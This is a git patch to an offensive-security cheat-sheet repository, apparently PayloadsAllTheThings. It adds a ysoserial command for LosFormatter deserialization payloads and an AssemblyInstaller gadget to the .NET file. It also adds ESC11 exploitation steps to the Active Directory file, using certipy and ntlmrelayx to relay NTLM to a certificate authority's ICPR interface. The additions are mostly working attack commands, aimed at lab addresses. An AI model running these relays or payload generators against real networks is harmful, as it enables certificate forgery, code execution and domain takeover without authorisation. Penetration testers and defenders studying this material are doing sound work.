From cbb2137f3b1300f5743b8026e0fabd3f964acde6 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 21 Nov 2022 10:48:27 +0100
Subject: [PATCH] ESC11 - Relay NTLM to ICPR

---
 Insecure Deserialization/DotNET.md            | 31 ++++++++++++++++---
 .../Active Directory Attack.md                | 18 ++++++++++-
 2 files changed, 44 insertions(+), 5 deletions(-)

diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md
index d5f014be..1dbc23d0 100644
--- a/Insecure Deserialization/DotNET.md	
+++ b/Insecure Deserialization/DotNET.md	
@@ -5,10 +5,12 @@
 * [Detection](#detection)
 * [Tools](#tools)
 * [Formatters](#formatters)
-    * [XmlSerializer](#)
-    * [DataContractSerializer](#)
-    * [JSON.NET](#)
-    * [BinaryFormatter](#)
+    * [XmlSerializer](#xmlserializer)
+    * [DataContractSerializer](#datacontractserializer)
+    * [NetDataContractSerializer](#netdatacontractserializer)
+    * [LosFormatter](#losformatter)
+    * [JSON.NET](#jsonnet)
+    * [BinaryFormatter](#binaryformatter)
 * [POP Gadgets](#pop-gadgets)
 * [References](#references)
 
@@ -73,6 +75,8 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
 
 ### NetDataContractSerializer 
 
+> It extends the `System.Runtime.Serialization.XmlObjectSerializer` class and is capable of serializing any type annotated with serializable attribute as `BinaryFormatter`.
+
 * In C# source code, look for `NetDataContractSerializer().ReadObject()`.
 * Payload output: **XML**
 
@@ -80,6 +84,14 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
 .\ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "calc.exe" -o base64 -t
 ```
 
+### LosFormatter
+
+* Use `BinaryFormatter` internally.
+
+```ps1
+.\ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -c "calc.exe" -o base64 -t
+```
+
 
 ### JSON.NET
 
@@ -132,6 +144,17 @@ List of popular gadgets used in common payloads.
     ```cs
     ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
     ```
+* **System.Configuration.Install.AssemblyInstaller**
+    * Execute payload with Assembly.Load   
+    ```cs
+    // System.Configuration.Install.AssemblyInstaller
+    public void set_Path(string value){
+        if (value == null){
+            this.assembly = null;
+        }
+        this.assembly = Assembly.LoadFrom(value);
+    }
+    ```
 
 
 ## References
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index c8d6f663..9088d15d 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -85,6 +85,7 @@
       - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
       - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
       - [ESC9 - No Security Extension](#esc9---no-security-extension)
+      - [ESC11 - Relaying NTLM to ICPR](#esc11---relaying-ntlm-to-icpr)
       - [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
       - [Pass-The-Certificate](#pass-the-certificate)
     - [Active Directory Federation Services](#active-directory-federation-services)
@@ -2589,6 +2590,20 @@ Jane@corp.local is allowed to enroll in the certificate template ESC9 that speci
     # Add -domain <domain> to your command line since there is no domain specified in the certificate.
     ```
 
+#### ESC11 - Relaying NTLM to ICPR
+
+> Encryption is not enforced for ICPR requests and Request Disposition is set to Issue
+
+Requirements:
+* [sploutchy/Certipy](https://github.com/sploutchy/Certipy) - Certipy fork
+* [sploutchy/impacket](https://github.com/sploutchy/impacket) - Impacket fork
+
+Exploitation:
+1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout` output
+2. Setup a relay using Impacket ntlmrelay and trigger a connection to it.
+    ```ps1
+    ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support
+    ```
 
 #### Certifried CVE-2022-26923
 
@@ -4105,4 +4120,5 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
 * [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
 * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
 * [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
-* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
\ No newline at end of file
+* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
+* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
\ No newline at end of file